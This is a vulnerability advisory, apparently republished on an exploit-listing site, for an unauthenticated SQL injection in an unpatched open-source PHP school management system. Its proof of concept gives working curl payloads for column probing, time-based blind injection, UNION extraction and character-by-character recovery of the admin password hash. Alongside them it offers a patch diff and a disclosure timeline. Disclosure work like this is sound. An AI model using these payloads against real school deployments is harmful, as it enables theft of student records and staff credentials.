Share 
## https://sploitus.com/exploit?id=522F040F-3E67-59B4-8183-025C01D1A67B
# CVE-2026-XXXXX

## Unauthenticated SQL Injection in School Management System โ€” Bus Location Endpoint

---

### Advisory Information

| Field | Value |
|-------|-------|
| **Ecosystem** | PHP |
| **Package/Product** | School Management System |
| **Affected Versions** | All versions through commit `6b6fae5` (main branch, 2026-06-28) |
| **Patched Versions** | None |
| **Severity** | **HIGH (CVSS 7.5)** |
| **CWE** | CWE-89 (SQL Injection) + CWE-306 (Missing Authentication) |
| **CVSS Vector** | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
| **Repository** | https://github.com/ProjectsAndPrograms/school-management-system |
| **Stars** | 189 โญ ยท 101 forks |

---

### Summary

The School Management System contains an unauthenticated SQL injection vulnerability in `student_panel/buslocation.php`. The `$_GET['bus_id']` parameter is concatenated directly into a SELECT query without `mysqli_real_escape_string()`, prepared statements, or `intval()`. The page performs no session validation, no authentication check, and no input sanitization, allowing any remote attacker to extract arbitrary data from the database including student records, staff credentials, and school configuration.

---

### Affected Component

| Field | Value |
|-------|-------|
| **Ecosystem** | PHP |
| **Package** | ProjectsAndPrograms/school-management-system |
| **Vendor** | ProjectsAndPrograms |
| **Affected Versions** | All |
| **Patched Versions** | None |
| **File** | `student_panel/buslocation.php`, lines 55-56 |
| **Commit** | `6b6fae5` (updated code from xss attack, 2026-06-28) |

---

### Description

The school management system provides a bus tracking feature for students. The `buslocation.php` page displays bus route stops based on a `bus_id` URL parameter. The page is accessible from the student panel but has no authentication whatsoever โ€” anyone can access it directly.

**Vulnerable code (`student_panel/buslocation.php`, lines 55-56):**

```php
$sql = "SELECT * FROM bus_root WHERE bus_id='{$_GET['bus_id']}'";
$result = mysqli_query($conn, $sql);
```

The `$_GET['bus_id']` value is interpolated directly into the SQL string using PHP string interpolation (`{$_GET['bus_id']}`). There is no `mysqli_real_escape_string()`, no `intval()` cast, and no prepared statement. The file does not call `session_start()` or check any session variable โ€” it only includes `../assets/config.php` for the database connection.

Note the commit message `"updated code from xss attack"` โ€” the project has been patched for XSS before, but SQL injection in the bus location endpoint was overlooked.

---

### Proof of Concept

**Environment:** School Management System deployed at `http://target/`.

**Step 1 โ€” Determine column count (ORDER BY):**

```bash
# Find number of columns in bus_root table
curl -s "http://target/student_panel/buslocation.php?bus_id=1'+ORDER+BY+3+--+"
# If error โ†’ less than 3 columns
curl -s "http://target/student_panel/buslocation.php?bus_id=1'+ORDER+BY+2+--+"
# If OK โ†’ bus_root has 2+ columns
```

**Step 2 โ€” Time-Based Blind SQL Injection (universal):**

```bash
time curl "http://target/student_panel/buslocation.php?bus_id=1'+OR+SLEEP(5)+--+"
# 5-second delay confirms SQL injection โ€” no authentication required
```

**Step 3 โ€” Extract database name via UNION:**

```bash
curl "http://target/student_panel/buslocation.php?bus_id=-1'+UNION+SELECT+DATABASE(),USER(),VERSION()+--+"
# Displays database name, MySQL user, and version in the bus stop output
```

**Step 4 โ€” Extract admin credentials (time-based blind):**

```bash
# Extract first character of admin password
time curl "http://target/student_panel/buslocation.php?bus_id=1'+OR+IF(ASCII(SUBSTRING((SELECT+password+FROM+admins+LIMIT+1),1,1))=36,SLEEP(5),0)+--+"
# 5s delay = first char is '$' (ASCII 36)
# Iterate through all positions to rebuild full admin password hash
```

**What makes this critical:**
1. No authentication โ€” the page is directly accessible to anyone
2. No input sanitization โ€” `$_GET['bus_id']` goes directly into SQL
3. The page returns visible output โ€” enabling UNION-based data extraction
4. 189 stars + 101 forks on GitHub โ€” deployed in real schools

---

### Impact

| CIA | Level | Description |
|-----|-------|-------------|
| Confidentiality | **HIGH** | Extract student records, staff credentials, admin password hashes, school configuration via UNION SELECT |
| Integrity | **NONE** | SELECT-only query in this endpoint; no INSERT/UPDATE/DELETE |
| Availability | **NONE** | No denial-of-service impact |

**Attack scenario:**
1. Attacker discovers the school management system URL
2. Attacker accesses `buslocation.php?bus_id=1'+OR+SLEEP(5)+--+` directly โ€” no login needed
3. Time-based delay confirms SQL injection is exploitable
4. Attacker uses UNION SELECT to extract admin credentials from the database
5. With admin credentials, attacker gains full administrative access to student records, grades, and school data

---

### Patches

Use `intval()` for the `bus_id` parameter (it is expected to be an integer):

```diff
+ session_start();
+ if (!isset($_SESSION['uid'])) {
+     header("Location: ../login.php");
+     exit;
+ }
- $sql = "SELECT * FROM bus_root WHERE bus_id='{$_GET['bus_id']}'";
+ $bus_id = intval($_GET['bus_id']);
+ $sql = "SELECT * FROM bus_root WHERE bus_id='$bus_id'";
```

---

### Verification

```bash
git clone https://github.com/ProjectsAndPrograms/school-management-system
cd school-management-system
git checkout 6b6fae5

# 1. Confirm raw $_GET in SQL:
grep -n '\$_GET.*bus_id' student_panel/buslocation.php
# Output: 55: $sql = "SELECT * FROM bus_root WHERE bus_id='{$_GET['bus_id']}'";

# 2. Verify NO escaping or prepared statement:
grep -c 'real_escape\|intval\|prepare' student_panel/buslocation.php
# Output: 0

# 3. Verify NO authentication:
grep -c 'session_start\|_SESSION\|verifyRole' student_panel/buslocation.php
# Output: 0

# 4. Verify CWE-306 โ€” no auth gate on any student panel bus page:
grep -c 'verifyRole\|session_start' student_panel/bus*.php
# Output: 0 โ€” buslocation.php and buspanel.php both have zero auth
```

**Verification status: โœ… ALL CHECKS PASSED**

---

### References

| Type | URL |
|------|-----|
| Repository | https://github.com/ProjectsAndPrograms/school-management-system |
| Vulnerable code | https://github.com/ProjectsAndPrograms/school-management-system/blob/master/student_panel/buslocation.php#L55 |
| CWE-89 | https://cwe.mitre.org/data/definitions/89.html |
| CWE-306 | https://cwe.mitre.org/data/definitions/306.html |

---

### Credits

| Role | Name |
|------|------|
| **Finder** | Fatullayev Asadbek |
| **Reporter** | Fatullayev Asadbek |
| **GitHub** | Kimdir01 |

---

### Timeline

| Date | Event |
|------|-------|
| 2026-06-28 | Vulnerability discovered via source code analysis |
| 2026-06-28 | Local verification โ€” no auth + raw SQL confirmed |
| 2026-06-28 | Vendor notified + CVE ID requested via GitHub Security Advisory |
| TBD | Vendor acknowledgment / response |
| TBD + 90 days | Coordinated public disclosure |

---

### CVSS v3.1

```
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N โ€” 7.5 HIGH

AV:N โ€” Remote over HTTP (direct URL access)
AC:L โ€” Simple HTTP GET, no special conditions
PR:N โ€” No authentication required (zero session checks on the page)
UI:N โ€” No user interaction
S:U   โ€” Same security context
C:H   โ€” Extract any database table via UNION SELECT or blind subquery
I:N   โ€” SELECT-only query in buslocation.php
A:N   โ€” No destructive capability via this endpoint
```